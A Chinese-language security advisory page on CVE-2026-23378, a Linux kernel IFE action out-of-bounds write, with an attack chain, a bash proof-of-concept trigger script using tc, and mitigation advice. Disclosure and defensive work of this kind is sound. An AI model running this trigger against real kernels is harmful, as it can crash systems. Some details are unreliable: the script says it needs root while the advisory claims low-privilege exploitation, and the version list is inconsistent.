CVE-2026-23378 CVSS 7.8 高危

CVE-2026-23378: Linux内核IFE模块越界写入漏洞

披露日期: 2026-03-25

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23378

漏洞类型

内存越界写入

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核net/sched模块中的IFE（Inter-FE）动作处理逻辑存在安全漏洞。在执行IFE动作替换操作时，代码错误地将新元数据追加到现有的元数据列表中，而非进行替换。这种逻辑缺陷导致元数据列表不受控制地增长，最终在执行编码操作时触发堆越界写入错误。该漏洞允许本地低权限攻击者利用此缺陷，可能导致内核崩溃或潜在的权限提升。

技术细节

该漏洞源于Linux内核网络流量控制（tc）子系统中的IFE动作处理机制。在`net/sched/act_ife.c`文件的实现中，当通过`tc`命令执行IFE动作的替换操作时，代码逻辑未能正确处理元数据列表。正常情况下，替换操作应当更新或重置现有的元数据，但受影响的版本仅执行追加操作。随着替换操作的重复执行，元数据列表的大小会无限制地增加，最终超出预分配的内存缓冲区边界。当内核尝试调用`ife_tlv_meta_encode`函数对这些元数据进行编码处理时，会向缓冲区末尾之外的内存地址写入4字节大小的数据。这种Slab越界写入行为会被KASAN检测到。由于该漏洞允许本地低权限用户（PR:L）触发，攻击者可利用此缺陷破坏内核内存结构，进而实现本地权限提升（LPE）或导致内核崩溃（DoS），严重威胁系统的机密性、完整性和可用性。

攻击链分析

STEP 1

步骤1

攻击者获取本地系统的低权限用户访问。

STEP 2

步骤2

攻击者利用`tc`（流量控制）工具向网络接口添加并反复替换IFE动作。

STEP 3

步骤3

由于内核代码缺陷，每次替换操作导致元数据列表不断追加而非更新，消耗过多内存。

STEP 4

步骤4

触发网络流量处理，调用`ife_tlv_meta_encode`函数，触发Slab越界写入。

STEP 5

步骤5

导致内核崩溃（DoS）或通过破坏内存结构实现权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-23378: IFE metalist OOB Write
# This script demonstrates the trigger condition by repeatedly replacing IFE actions.
# Requires root privileges to manipulate tc (traffic control).

# Setup a dummy network interface for testing
ip link add dummy0 type dummy
ip link set dummy0 up

# Add ingress qdisc to attach the filter
tc qdisc add dev dummy0 handle ffff: ingress

# Add initial IFE action with specific metadata
tc filter add dev dummy0 parent ffff: protocol ip prio 1 \
    action ife encode allow \
    use mark 0xff

echo "[+] Triggering the vulnerability by replacing the IFE action..."
# The vulnerability occurs here: 'change' (replace) appends instead of replacing
# Loop to cause the metalist to grow unboundedly
for i in {1..1000}; do
    tc filter change dev dummy0 parent ffff: protocol ip prio 1 \
        action ife encode allow \
        use mark 0xff
    if [ $((i % 100)) -eq 0 ]; then
        echo "[-] Iteration $i: Metalist growing..."
    fi
done

echo "[+] Triggering encode operation (e.g., sending traffic)..."
# Sending traffic might trigger the OOB write in ife_tlv_meta_encode
ping -c 1 192.0.2.1 > /dev/null 2>&1 &

# Cleanup
tc qdisc del dev dummy0 ingress
ip link del dummy0
echo "[+] Done. Check dmesg for KASAN: slab-out-of-bounds reports."

影响范围

Linux Kernel < 5.10 (需应用补丁)

Linux Kernel < 5.15 (需应用补丁)

Linux Kernel < 6.1 (需应用补丁)

Linux Kernel < 6.6 (需应用补丁)

防御指南

临时缓解措施

建议立即限制本地用户对网络配置工具（如tc）的使用权限，并监控内核日志中是否有KASAN报告的slab-out-of-bounds错误。同时，应尽快应用官方发布的内核补丁以修复metalist更新逻辑。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表